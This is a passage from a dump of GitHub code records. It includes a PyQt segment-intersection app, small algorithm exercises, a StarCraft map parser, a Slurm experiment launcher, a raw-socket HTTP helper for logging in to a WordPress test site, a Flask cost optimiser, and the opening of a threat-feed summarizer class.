self.y_5label = QLabel(\"YP\",self)\r\n self.y_6label = QLabel()\r\n self.informacja = QLabel()\r\n \r\n self.figure=plt.figure()\r\n self.canvas=FigureCanvas(self.figure)\r\n # ladne ustawienie i wyrodkowanie\r\n layout = QGridLayout(self)\r\n layout.addWidget(self.button, 9, 1, 1, -1)\r\n layout.addWidget(self.xlabel, 1, 1)\r\n layout.addWidget(self.xEdit, 1, 2)\r\n layout.addWidget(self.ylabel, 2, 1)\r\n layout.addWidget(self.yEdit, 2, 2)\r\n layout.addWidget(self.x_2label, 3, 1)\r\n layout.addWidget(self.x_2Edit, 3, 2)\r\n layout.addWidget(self.y_2label, 4, 1)\r\n layout.addWidget(self.y_2Edit, 4, 2)\r\n layout.addWidget(self.x_3label, 5, 1)\r\n layout.addWidget(self.x_3Edit, 5, 2)\r\n layout.addWidget(self.y_3label, 6, 1)\r\n layout.addWidget(self.y_3Edit, 6, 2)\r\n layout.addWidget(self.x_4label, 7, 1)\r\n layout.addWidget(self.x_4Edit, 7, 2)\r\n layout.addWidget(self.y_4label, 8, 1)\r\n layout.addWidget(self.y_4Edit, 8, 2)\r\n layout.addWidget(self.canvas, 10, 1, 1, -1)\r\n layout.addWidget(self.clrChoose, 11, 1, 1, -1)\r\n \r\n #informacje zwiazane z pkt P\r\n layout.addWidget(self.info, 1, 3)\r\n layout.addWidget(self.x_5label, 2, 3)\r\n layout.addWidget(self.x_6label, 3, 3)\r\n layout.addWidget(self.y_5label, 2, 4)\r\n layout.addWidget(self.y_6label, 3, 4)\r\n layout.addWidget(self.informacja, 4, 3)\r\n \r\n layout.addWidget(self.button1, 8, 3, 1, -1)\r\n layout.addWidget(self.button2, 7, 3, 1, -1)\r\n \r\n # połączenie przycisku (signal) z akcją (slot)\r\n self.button.clicked.connect(self.handleButton)\r\n self.clrChoose.clicked.connect(self.clrChooseF)\r\n self.button1.clicked.connect(self.usun)\r\n self.button2.clicked.connect(self.zapisz)\r\n\r\n def checkValues(self,lineE):\r\n if lineE.text().lstrip('-').replace('.','').isdigit():\r\n return float (lineE.text())\r\n else:\r\n sys.exit(\"zle wspolrzedne, wprowadz jeszcze raz\")\r\n \r\n def rysuj(self,clr='m'):\r\n x=self.checkValues(self.xEdit)\r\n y=self.checkValues(self.yEdit)\r\n \r\n x1 = self.checkValues(self.x_2Edit)\r\n y1 = self.checkValues(self.y_2Edit)\r\n \r\n x2 = self.checkValues(self.x_3Edit)\r\n y2 = self.checkValues(self.y_3Edit)\r\n \r\n x3 = self.checkValues(self.x_4Edit)\r\n y3 = self.checkValues(self.y_4Edit)\r\n \r\n P1, P2=[x, x1],[y, y1]\r\n P3, P4=[x2, x3],[y2, y3]\r\n \r\n S=[x,y,\r\n x1,y1,\r\n x2,y2,\r\n x3,y3]\r\n M=(S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4])\r\n\r\n if M != 0:\r\n t1=((S[4]-S[0])*(S[7]-S[5])-(S[5]-S[1])*(S[6]-S[4]))/((S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4]))\r\n t2=((S[4]-S[0])*(S[3]-S[1])-(S[5]-S[1])*(S[2]-S[0]))/((S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4])) \r\n XP=S[4]+t2*(S[6]-S[4])\r\n YP=S[5]+t2*(S[7]-S[5])\r\n #sprawdzenie, w którym miejscu znajduje się punkt P\r\n if t1>=0 and t1<=1 and t2>=0 and t2<=1:\r\n self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n self.informacja.setText('Na przecięciu dwóch odcinków')\r\n elif 0<=t1<=1:\r\n self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n self.informacja.setText('Na przedłużeniu odcinka CD')\r\n elif 0<=t2<=1: \r\n self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n self.informacja.setText('Na przedłużeniu odcinka AB')\r\n else:\r\n self.x_6label.setText(str('{:.3f}'.format(XP)))\r\n self.y_6label.setText(str('{:.3f}'.format(YP)))\r\n self.informacja.setText('Na przedłużeniu obu odcinków')\r\n \r\n #sprawdzneie czy nie dzielimy przez zero\r\n else:\r\n msg_err = QMessageBox()\r\n msg_err.setIcon(QMessageBox.Warning)\r\n msg_err.setWindowTitle('Błąd')\r\n msg_err.setStandardButtons(QMessageBox.Ok)\r\n msg_err.setText('Dzielenie przez zero. Nie można obliczyć współrzędnych punktu przecięcia.')\r\n msg_err.exec_()\r\n self.figure.clear()\r\n self.canvas.draw()\r\n \r\n if x != None and y !=None:\r\n self.figure.clear()\r\n ax = self.figure.add_subplot(111)\r\n ax.plot(x, y, 'o',color=clr)\r\n ax.text(x,y,'A['+str(x)+','+str(y)+']')\r\n ax.plot(x1, y1, 'o', color=clr)\r\n ax.text(x1,y1,'B['+str(x1)+','+str(y1)+']')\r\n ax.plot(x2, y2, 'o', color=clr)\r\n ax.text(x2,y2,'C['+str(x2)+','+str(y2)+']')\r\n ax.plot(x3, y3, 'o', color=clr)\r\n ax.text(x3,y3,'D['+str(x3)+','+str(y3)+']')\r\n ax.plot((x,x1), (y,y1),'-',color=clr)\r\n ax.plot((x2,x3), (y2,y3),'-',color=clr)\r\n if M != 0:\r\n ax.plot(XP,YP,'o',color='black')\r\n ax.text(XP,YP,'P['+str('{:.3f}'.format(XP))+','+str('{:.3f}'.format(YP))+']')\r\n ax.plot((x,XP), (y,YP),'--',dashes=(1,5),color=clr)\r\n ax.plot((x1,XP),(y1,YP),'--',dashes=(1,5),color=clr)\r\n ax.plot((x2,XP),(y2,YP),'--',dashes=(1,5),color=clr)\r\n ax.plot((x3,XP),(y3,YP),'--',dashes=(1,5),color=clr)\r\n #plt.plot(P1, P2, P3, P4, marker='o', color=clr)\r\n #plt.plot(XP,YP,'o','k')\r\n #plt.plot(P1, P2, XP, YP,'--','k')\r\n self.canvas.draw() \r\n #sprawdzenie czy dane zostały wprowadzone poprawnie \r\n else:\r\n msg_err = QMessageBox()\r\n msg_err.setIcon(QMessageBox.Warning)\r\n msg_err.setWindowTitle('Błąd')\r\n msg_err.setStandardButtons(QMessageBox.Ok)\r\n msg_err.setText('Wprowadzono niepoprawne współrzędne')\r\n msg_err.exec_()\r\n self.figure.clear()\r\n self.canvas.draw()\r\n \r\n def handleButton(self, clr='r'):\r\n self.rysuj() #rysowanie wykresu\r\n \r\n def clrChooseF(self):\r\n color=QColorDialog.getColor()\r\n if color.isValid():\r\n self.handleButton(color.name()) #pozwala wybrać kolor wykresu\r\n \r\n def usun(self): #usuwa dane z okienek\r\n self.xEdit.clear()\r\n self.yEdit.clear()\r\n self.x_2Edit.clear()\r\n self.y_2Edit.clear()\r\n self.x_3Edit.clear()\r\n self.y_3Edit.clear()\r\n self.x_4Edit.clear()\r\n self.y_4Edit.clear()\r\n self.x_6label.clear()\r\n self.y_6label.clear()\r\n self.informacja.clear()\r\n self.figure.clear()\r\n \r\n \r\n \r\n def zapisz(self): #zapisywanie wyników do pliku\r\n wyniki = open('wyniki.txt','a')\r\n wyniki.write(55*'*')\r\n wyniki.write('\\n|{:^10}|{:^10}|{:^30}|\\n'.format('XP', 'YP', 'Informacja o punkcie P'))\r\n wyniki.write(55*'*')\r\n wyniki.write('\\n|{:^10}|{:^10}|{:^30}|\\n'.format(self.x_6label.text(),self.y_6label.text(), self.informacja.text()))\r\n wyniki.write(55*'*')\r\n\r\nif __name__ == '__main__':\r\n if not QApplication.instance():\r\n app=QApplication(sys.argv)\r\n else:\r\n app=QApplication.instance()\r\n \r\n window = Window()\r\n window.show()\r\n sys.exit(app.exec_())\r\n ","repo_name":"291425/repository2","sub_path":"Kamila_Zembrzycka_grupa1_projekt1.py","file_name":"Kamila_Zembrzycka_grupa1_projekt1.py","file_ext":"py","file_size_in_byte":9664,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74022846232","text":"# -*- coding: utf-8 -*-\n\n\nclass MedianFinder(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.length = 0\n self.result = list()\n \n def halfSearch(self, num, left, right):\n if left == right:\n if num >= self.result[left]:\n self.result.insert(left + 1, num)\n else:\n self.result.insert(left, num)\n \n return \n\n half_value = int((left + right) / 2)\n if self.result[half_value] > num:\n self.halfSearch(num, left, half_value)\n else:\n self.halfSearch(num, half_value + 1, right)\n\n def addNum(self, num):\n \"\"\"\n :type num: int\n :rtype: None\n \"\"\"\n if num or num == 0:\n if not self.result:\n self.result.append(num)\n else:\n self.halfSearch(num, 0, self.length - 1)\n self.length = len(self.result)\n\n def findMedian(self):\n \"\"\"\n :rtype: float\n \"\"\"\n print(self.result)\n if self.length % 2 != 0:\n half_index = int(self.length / 2)\n return self.result[half_index]\n else:\n half_index = int(self.length / 2)\n return (self.result[half_index] + self.result[half_index - 1]) / 2\n \n\nif __name__ == \"__main__\":\n S = MedianFinder()\n S.addNum(\"\")\n S.addNum(1)\n S.addNum(2)\n print(S.findMedian())\n S.addNum(\"\")\n S.addNum(3)\n # print(S.findMedian())\n # S.addNum(\"\")\n # print(S.findMedian())\n\n \n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()","repo_name":"KilburnBuilding/Leetcode","sub_path":"295.py","file_name":"295.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18972000928","text":"# 이것이 취업을 위한 코딩 테스트다 with 파이썬 (p.150)\n# 실전문제 음료수 얼려 먹기 > dfs\n\n# n, m = map(int, input().split())\nn, m = 5, 6\n\ngraph = [\n [1, 0, 1, 0, 1, 0], \n [1, 1, 1, 1, 1, 1], \n [0, 0, 0, 0, 0, 1], \n [1, 0, 1, 1, 1, 1], \n [1, 1, 1, 1, 0, 0]\n ]\n\n#graph = []\n#for i in range(n):\n# graph.append(list(map(int, input())))\n\ndef dfs(x, y):\n if x <= -1 or x >= n or y <= -1 or y >= m:\n return False\n if graph[x][y] == 0:\n graph[x][y] = 1\n dfs(x, y+1) # 상\n dfs(x, y-1) # 하\n dfs(x-1, y) # 좌\n dfs(x+1, y) # 우\n return True\n return False\n\nresult = 0\nfor i in range(n):\n for j in range(m):\n if dfs(i, j) == True:\n result += 1\n\n\nprint(result)","repo_name":"Jiyongs/algorithm","sub_path":"dfs_bfs/broke_ice.py","file_name":"broke_ice.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"39566393448","text":"\nfrom .CHKRequirements import CHKRequirements\nfrom .CHKSectionUnknown import CHKSectionUnknown\nfrom .Sections import *\n\nfrom ...FileFormats import TBL, AIBIN\n\nfrom ...Utilities import Assets\nfrom ...Utilities.fileutils import load_file\nfrom ...Utilities.PyMSError import PyMSError\nfrom ...Utilities.AtomicWriter import AtomicWriter\n\nimport struct, math, os\n\nclass CHK:\n\tSECTION_TYPES = {\n\t\tCHKSectionTYPE.NAME:CHKSectionTYPE,\n\t\tCHKSectionVER.NAME:CHKSectionVER,\n\t\tCHKSectionIVER.NAME:CHKSectionIVER,\n\t\tCHKSectionIVE2.NAME:CHKSectionIVE2,\n\t\tCHKSectionVCOD.NAME:CHKSectionVCOD,\n\t\tCHKSectionIOWN.NAME:CHKSectionIOWN,\n\t\tCHKSectionOWNR.NAME:CHKSectionOWNR,\n\t\tCHKSectionERA.NAME:CHKSectionERA,\n\t\tCHKSectionDIM.NAME:CHKSectionDIM,\n\t\tCHKSectionSIDE.NAME:CHKSectionSIDE,\n\t\tCHKSectionMTXM.NAME:CHKSectionMTXM,\n\t\tCHKSectionPUNI.NAME:CHKSectionPUNI,\n\t\tCHKSectionUPGR.NAME:CHKSectionUPGR,\n\t\tCHKSectionPTEC.NAME:CHKSectionPTEC,\n\t\tCHKSectionUNIT.NAME:CHKSectionUNIT,\n\t\tCHKSectionTILE.NAME:CHKSectionTILE,\n\t\tCHKSectionDD2.NAME:CHKSectionDD2,\n\t\tCHKSectionTHG2.NAME:CHKSectionTHG2,\n\t\tCHKSectionMASK.NAME:CHKSectionMASK,\n\t\tCHKSectionSTR.NAME:CHKSectionSTR,\n\t\tCHKSectionUPRP.NAME:CHKSectionUPRP,\n\t\tCHKSectionUPUS.NAME:CHKSectionUPUS,\n\t\tCHKSectionMRGN.NAME:CHKSectionMRGN,\n\t\tCHKSectionTRIG.NAME:CHKSectionTRIG,\n\t\tCHKSectionMBRF.NAME:CHKSectionMBRF,\n\t\tCHKSectionSPRP.NAME:CHKSectionSPRP,\n\t\tCHKSectionFORC.NAME:CHKSectionFORC,\n\t\tCHKSectionWAV.NAME:CHKSectionWAV,\n\t\tCHKSectionUNIS.NAME:CHKSectionUNIS,\n\t\tCHKSectionUPGS.NAME:CHKSectionUPGS,\n\t\tCHKSectionTECS.NAME:CHKSectionTECS,\n\t\tCHKSectionSWNM.NAME:CHKSectionSWNM,\n\t\tCHKSectionCOLR.NAME:CHKSectionCOLR,\n\t\tCHKSectionPUPx.NAME:CHKSectionPUPx,\n\t\tCHKSectionPTEx.NAME:CHKSectionPTEx,\n\t\tCHKSectionUNIx.NAME:CHKSectionUNIx,\n\t\tCHKSectionUPGx.NAME:CHKSectionUPGx,\n\t\tCHKSectionTECx.NAME:CHKSectionTECx\n\t}\n\n\tdef __init__(self, stat_txt=None, aiscript=None):\n\t\tif isinstance(stat_txt, TBL.TBL):\n\t\t\tself.stat_txt = stat_txt\n\t\telse:\n\t\t\tif stat_txt == None:\n\t\t\t\tstat_txt = Assets.mpq_file_path('rez', 'stat_txt.tbl')\n\t\t\tself.stat_txt = TBL.TBL()\n\t\t\tself.stat_txt.load_file(stat_txt)\n\t\tif isinstance(aiscript, AIBIN.AIBIN):\n\t\t\tself.aiscript = aiscript\n\t\telse:\n\t\t\tif aiscript == None:\n\t\t\t\taiscript = Assets.mpq_file_path('scripts', 'aiscript.bin')\n\t\t\tself.aiscript = AIBIN.AIBIN(stat_txt=self.stat_txt)\n\t\t\tself.aiscript.load_file(aiscript)\n\t\tself.sections = {}\n\t\tself.section_order = []\n\n\tdef get_section(self, name, game_mode=CHKRequirements.MODE_ALL):\n\t\tsect_class = CHK.SECTION_TYPES[name]\n\t\trequired = False\n\n\t\tif name == CHKSectionVER.NAME:\n\t\t\trequired = True\n\t\telif sect_class:\n\t\t\trequired = sect_class.REQUIREMENTS.is_required(self, game_mode)\n\t\tsect = self.sections.get(name)\n\t\tif required and sect == None and sect_class:\n\t\t\tsect = sect_class(self)\n\t\t\tself.sections[name] = sect\n\t\treturn sect\n\n\tdef player_color(self, player):\n\t\tcolors = CHKSectionCOLR.DEFAULT_COLORS\n\t\tcolr = self.get_section(CHKSectionCOLR.NAME)\n\t\tif colr:\n\t\t\tcolors = colr.colors\n\t\tcolors.extend((CHKSectionCOLR.GREEN,CHKSectionCOLR.PALE_YELLOW,CHKSectionCOLR.TAN,CHKSectionCOLR.NEUTRAL))\n\t\treturn colors[player]\n\n\tdef load_file(self, file):\n\t\tdata = load_file(file, 'CHK')\n\t\ttry:\n\t\t\tself.load_data(data)\n\t\texcept PyMSError as e:\n\t\t\traise e\n\t\texcept:\n\t\t\traise PyMSError('Load',\"Unsupported CHK file '%s', could possibly be corrupt\" % file)\n\n\tdef load_data(self, data):\n\t\toffset = 0\n\t\tsections = {}\n\t\tsection_order = []\n\t\ttoProcess = []\n\t\twhile offset < len(data)-8:\n\t\t\tname,length = struct.unpack('<4sL', data[offset:offset+8])\n\t\t\toffset += 8\n\t\t\tsect_class = CHK.SECTION_TYPES.get(name)\n\t\t\tif not sect_class:\n\t\t\t\tsect = CHKSectionUnknown(self, name)\n\t\t\telse:\n\t\t\t\tsect = sect_class(self)\n\t\t\tsect.load_data(data[offset:offset+min(length,len(data)-offset)])\n\t\t\tsections[name] = sect\n\t\t\tsection_order.append(name)\n\t\t\tif hasattr(sect, \"process_data\"):\n\t\t\t\ttoProcess.append(sect)\n\t\t\toffset += length\n\t\tself.sections = sections\n\t\tself.section_order = section_order\n\t\tfor sect in toProcess:\n\t\t\tsect.process_data()\n\n\tdef save_file(self, file):\n\t\tdata = self.save_data()\n\t\ttry:\n\t\t\tf = AtomicWriter(file, 'wb')\n\t\texcept:\n\t\t\traise PyMSError('Save',\"Could not save CHK to file '%s'\" % file)\n\t\tf.write(data)\n\t\tf.close()\n\n\tdef save_data(self):\n\t\tresult = ''\n\t\torder = []\n\t\torder.extend(self.section_order)\n\t\tfor name in self.sections.keys():\n\t\t\tif not name in order:\n\t\t\t\torder.append(name)\n\t\tfor name in order:\n\t\t\tsection = self.sections.get(name)\n\t\t\tif section:\n\t\t\t\tdata = section.save_data()\n\t\t\t\tresult += struct.pack('<4sL', section.name, len(data))\n\t\t\t\tresult += data\n\t\treturn result\n","repo_name":"poiuyqwert/PyMS","sub_path":"PyMS/FileFormats/CHK/CHK.py","file_name":"CHK.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"5"} +{"seq_id":"19433693606","text":"import os\nimport subprocess\nimport time\nimport numpy as np\n\nATARI_ENV_IDS = [\n \"AlienNoFrameskip-v4\",\n \"AmidarNoFrameskip-v4\",\n \"AssaultNoFrameskip-v4\",\n \"AsterixNoFrameskip-v4\",\n \"AsteroidsNoFrameskip-v4\",\n \"AtlantisNoFrameskip-v4\",\n \"BankHeistNoFrameskip-v4\",\n \"BattleZoneNoFrameskip-v4\",\n \"BeamRiderNoFrameskip-v4\",\n \"BerzerkNoFrameskip-v4\",\n \"BowlingNoFrameskip-v4\",\n \"BoxingNoFrameskip-v4\",\n \"BreakoutNoFrameskip-v4\",\n \"CentipedeNoFrameskip-v4\",\n \"ChopperCommandNoFrameskip-v4\",\n \"CrazyClimberNoFrameskip-v4\",\n \"-\",\n \"DemonAttackNoFrameskip-v4\",\n \"DoubleDunkNoFrameskip-v4\",\n \"EnduroNoFrameskip-v4\",\n \"FishingDerbyNoFrameskip-v4\",\n \"FreewayNoFrameskip-v4\",\n \"FrostbiteNoFrameskip-v4\",\n \"GopherNoFrameskip-v4\",\n \"GravitarNoFrameskip-v4\",\n \"HeroNoFrameskip-v4\",\n \"IceHockeyNoFrameskip-v4\",\n \"JamesbondNoFrameskip-v4\",\n \"KangarooNoFrameskip-v4\",\n \"KrullNoFrameskip-v4\",\n \"KungFuMasterNoFrameskip-v4\",\n \"MontezumaRevengeNoFrameskip-v4\",\n \"MsPacmanNoFrameskip-v4\",\n \"NameThisGameNoFrameskip-v4\",\n \"PhoenixNoFrameskip-v4\",\n \"PitfallNoFrameskip-v4\",\n \"PongNoFrameskip-v4\",\n \"PrivateEyeNoFrameskip-v4\",\n \"QbertNoFrameskip-v4\",\n \"RiverraidNoFrameskip-v4\",\n \"RoadRunnerNoFrameskip-v4\",\n \"RobotankNoFrameskip-v4\",\n \"SeaquestNoFrameskip-v4\",\n \"SkiingNoFrameskip-v4\",\n \"SolarisNoFrameskip-v4\",\n \"SpaceInvadersNoFrameskip-v4\",\n \"StarGunnerNoFrameskip-v4\",\n \"-\",\n \"TennisNoFrameskip-v4\",\n \"TimePilotNoFrameskip-v4\",\n \"TutankhamNoFrameskip-v4\",\n \"UpNDownNoFrameskip-v4\",\n \"VentureNoFrameskip-v4\",\n \"VideoPinballNoFrameskip-v4\",\n \"WizardOfWorNoFrameskip-v4\",\n \"YarsRevengeNoFrameskip-v4\",\n \"ZaxxonNoFrameskip-v4\",]\nsuper_exp_id = \"2018:05:16-00:41:31\"\n# super_exp_id = time.strftime(\"%Y:%m:%d-%H:%M:%S\")\ngames = [\n # \"FrostbiteNoFrameskip-v4\",\n # \"SkiingNoFrameskip-v4\",\n # \"VentureNoFrameskip-v4\",\n \"KangarooNoFrameskip-v4\",\n # \"GravitarNoFrameskip-v4\",\n # \"AsteroidsNoFrameskip-v4\",\n # \"ZaxxonNoFrameskip-v4\",\n # \"AmidarNoFrameskip-v4\",\n # \"AssaultNoFrameskip-v4\",\n # \"AsterixNoFrameskip-v4\",\n # \"SeaquestNoFrameskip-v4\",\n # \"EnduroNoFrameskip-v4\",\n # \"AtlantisNoFrameskip-v4\"\n ]\n\nfrom gym import envs\nall_envs = envs.registry.all()\nenv_ids = [env_spec.id for env_spec in all_envs]\nfor env_id in games:\n assert env_id in env_ids\n\nn_games = len(games)\nseeds = range(5)\nrnd = np.random.randint(2**31)\n\nprint(\"This will launch {} jobs for 12 hours on 8 nodes each.\".format(n_games * len(seeds)))\nprint(\"This will cost you a maximum of {} core-hours\".format(12*8*32*n_games*len(seeds)))\nif not input(\"Is your config file correct? y/n:\")==\"y\":\n exit()\nif not input(\"Is the number of hours and nodes and tasks set correctly in your slurm script? y/n:\")==\"y\":\n exit()\nprint(\"If you wish to proceed, copy the following number: {}\".format(rnd))\nx=input(\">>\")\nif x == str(rnd):\n\n os.environ[\"super_exp_id\"]=super_exp_id\n for env_id in games:\n if not env_id ==\"-\":\n # os.mkdir(os.path.join(\"logs\", super_exp_id, env_id))\n\n for seed in seeds:\n\n os.makedirs(os.path.join(\"logs\", super_exp_id, env_id, str(seed)))\n new_shell_env = os.environ.copy()\n new_shell_env[\"global_seed\"]=str(seed)\n new_shell_env[\"env_id\"]=env_id\n subprocess.run(\"sbatch slurm/slurm_python_single.peta4\".split(),env=new_shell_env)\n\nelse:\n print(\"Closing...\")\n","repo_name":"boyentenbi/ga-dist","sub_path":"distributed/scripts/launch_multi.py","file_name":"launch_multi.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31811777212","text":"import re\n\nHOST = \"blogtest.vnprogramming.com\"\nPORT = 80\nPATH_LOGIN = \"/wp-login.php\"\nRECV_BUF = 1024\n\n\nclass ReqHeader:\n @staticmethod\n def get(cookie: str, host=HOST, path=PATH_LOGIN) -> str:\n \"\"\"Generate GET request's header\"\"\"\n return (f\"GET {path} HTTP/1.1\\r\\n\"\n f\"Cookie: {cookie}\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\")\n\n @staticmethod\n def post_form(cookie: str, boundary: str, length: int, path: str) -> str:\n \"\"\"Generate POST request's header with form-data\"\"\"\n return (f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: blogtest.vnprogramming.com\\r\\n\"\n f\"Content-Length: {length}\\r\\n\"\n f\"Content-Type: multipart/form-data; boundary={boundary}\\r\\n\"\n f\"Cookie: {cookie}\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\")\n\n @staticmethod\n def post_login(host, path, credential) -> str:\n \"\"\"Generate POST request's header with x-www-form-urlencoded\"\"\"\n user, password = credential\n body = (f\"log={user}&pwd={password}\"\n f\"&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblogtest.vnprogramming.com%2Fwp-admin%2F&testcookie=1\")\n return (f\"POST {path} HTTP/1.1\\r\\n\"\n f\"Host: {host}\\r\\n\"\n f\"Content-Length: {len(body)}\\r\\n\"\n f\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n f\"Cookie: wordpress_test_cookie=WP%20Cookie%20check\\r\\n\"\n f\"Connection: close\\r\\n\\r\\n\"\n + body)\n\n\nclass Response:\n \"\"\"Object that holds response's data\"\"\"\n\n def __init__(self, data: str or bytes):\n if type(data).__name__ == \"str\":\n self.res_header, self.res_body = tuple(data.split(\"\\r\\n\\r\\n\", 1))\n self.res_header += \"\\r\\n\\r\\n\"\n else:\n self.res_header, self.res_body = tuple(data.split(b\"\\r\\n\\r\\n\", 1))\n self.res_header = self.res_header.decode() + \"\\r\\n\\r\\n\"\n\n def header(self) -> str:\n \"\"\":return response's header\"\"\"\n return self.res_header\n\n def body(self) -> str or bytes:\n \"\"\":return response's body\"\"\"\n return self.res_body\n\n def re(self, string1, string2=\"\"):\n match = re.findall(fr\"^{string1}: (.*){string2}.*\\r$\", self.res_header, flags=re.MULTILINE)\n return match\n\n def length(self):\n \"\"\"Get Content-Length\"\"\"\n length = self.re(\"Content-Length\")\n return length[0] if length else None\n\n def cookie(self):\n \"\"\"Get Set-Cookie\"\"\"\n cookie_list = \"; \".join(self.re(\"Set-Cookie\", \";\"))\n return cookie_list\n\n def location(self):\n \"\"\"Get redirect location\"\"\"\n from urllib.parse import urlparse\n location = self.re(\"Location\")\n return urlparse(location[0]) if location else None\n\n def code(self):\n \"\"\"Get response code\"\"\"\n res_code = re.findall(r\"^HTTP/1\\.1 (\\d\\d\\d) .*\\r$\", self.res_header, flags=re.MULTILINE)\n return res_code[0] if res_code else None\n\n def type(self):\n \"\"\"Get Content-Type\"\"\"\n content_type = self.re(\"Content-Type\")\n return content_type[0] if type else None\n\n\n# class ResHeader:\n# \"\"\"Object that holds response's header data\"\"\"\n#\n# def __init__(self, res_header):\n# self.res_header = res_header\n#\n# def re(self, string1, string2=\"\"):\n# match = re.findall(fr\"^{string1}: (.*){string2}.*\\r$\", self.res_header, flags=re.MULTILINE)\n# return match\n#\n# def length(self):\n# \"\"\"Get Content-Length\"\"\"\n# length = self.re(\"Content-Length\")\n# return length[0] if length else None\n#\n# def cookie(self):\n# \"\"\"Get Set-Cookie\"\"\"\n# cookie_list = \"; \".join(self.re(\"Set-Cookie\", \";\"))\n# return cookie_list\n#\n# def location(self):\n# \"\"\"Get redirect location\"\"\"\n# from urllib.parse import urlparse\n# location = self.re(\"Location\")\n# return urlparse(location[0]) if location else None\n#\n# def code(self):\n# \"\"\"Get response code\"\"\"\n# res_code = re.findall(r\"^HTTP/1\\.1 (\\d\\d\\d) .*\\r$\", self.res_header, flags=re.MULTILINE)\n# return res_code[0] if res_code else None\n#\n# def type(self):\n# \"\"\"Get Content-Type\"\"\"\n# content_type = self.re(\"Content-Type\")\n# return content_type[0] if type else None\n#\n# def __str__(self):\n# return self.res_header\n\n\ndef get_res(req: bytes or str, host=HOST, port=PORT, raw=False) -> str or bytes or None:\n \"\"\"\n Send request and receive response from server\n :param req: request to send to server\n :param host:\n :param port:\n :param raw: control return type (True -> return bytes, else return str)\n :return: response from server\n \"\"\"\n import socket\n\n req = req.encode() if type(req).__name__ == \"str\" else req\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((host, port))\n s.sendall(req)\n res = recvall(s)\n if not res:\n return None\n return res if raw else res.decode()\n\n\ndef recvall(s) -> bytes:\n \"\"\"Receive complete response from server \"\"\"\n buf = b''\n chunk = s.recv(RECV_BUF)\n while len(chunk) != 0:\n buf += chunk\n chunk = s.recv(RECV_BUF)\n return buf\n","repo_name":"vcth4nh/VCS","sub_path":"prog4/Final/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25310125039","text":"from flask import Flask, render_template, request\nimport scipy.optimize as opt\nimport numpy as np\n\n\napp = Flask(__name__)\nimport calc_func as calc\n\n\n@app.route('/')\ndef serve_app():\n return render_template('index.html')\n\n\n@app.route('/calculate', methods=[\"GET\", \"POST\"])\ndef calculate():\n # check the request method to ensure the handling of POST request only\n if request.method == \"POST\":\n # store form values\n\n input_val = {\n 'temp2': request.form['temp2'],\n 'temp1': request.form['temp1'],\n 'steam_cost': request.form['steam_cost'],\n 'pipe_length': request.form['pipe_length'],\n 'pipe_size': request.form['pipe_size'],\n 'insulation_mat': request.form['insulation_mat'],\n 'runtime': request.form['runtime'],\n 'cost_per_length': request.form['cost_per_length'],\n 'cost_per_volume': request.form['cost_per_volume']\n }\n\n max_temp = float(input_val['temp2']) + 273\n pipe_size = float(input_val['pipe_size'])/2\n\n objective_function = lambda x: calc.total_costs(input_val, x[0], x[1])\n constraint1 = ({'type': 'ineq', 'fun': lambda x: np.array(max_temp - x[1])})\n constraint2 = ({'type': 'ineq', 'fun': lambda x: np.array(x[1] - 303)})\n\n results = opt.minimize(objective_function, x0=[3.0, max_temp-10], method='trust-constr', constraints=[constraint1, constraint2], options={'disp': True, 'xtol': 1e-08, 'gtol': 1e-08, 'barrier_tol': 1e-08, 'maxiter': 1100})\n thickness = results['x'][0] - pipe_size\n\n return render_template('calculate.html', results=results, thickness=thickness)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"cechiorlu/epitc","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9198273384","text":"from gawseed.threatfeed.config import Config\n\nfrom collections import Counter\n\nclass Summarizer(Config):\n \"\"\"Summarizes/counts data from another enricher's data;\n Produces a dictionary with data_key/count pairs\"\"\"\n def __init__(self, conf, search_index, dataset, is_binary, loader=None):\n super().__init__(conf)\n\n self.require(['enrichment_key', 'data_key'])\n\n self._data_key = self.config(\"data_key\",\n help=\"The data key to summarize data by\")\n self._enrichment_key = self.config(\"enrichment_key\",\n help=\"The enrichment key for the data to be sorted\")\n self._output_key = self.config('output_key', 'datasource',\n help=\"The output key to store the returned data in.\")\n\n def check_enrichment_data(self, enrichment_data):\n if self._enrichment_key not in enrichment_data:\n self.verbose(\"summarizer data wasn't present\")\n self.verbose(\" keys present:\" + str(enrichment_data.keys()))\n self.verbose(self.get_config())\n return False\n\n if type(enrichment_data[self._enrichment_key]) != list:\n self.verbose(\"summarizer data wasn't in a list: \" + type(enrichment_data[self._enrichment_key]))\n 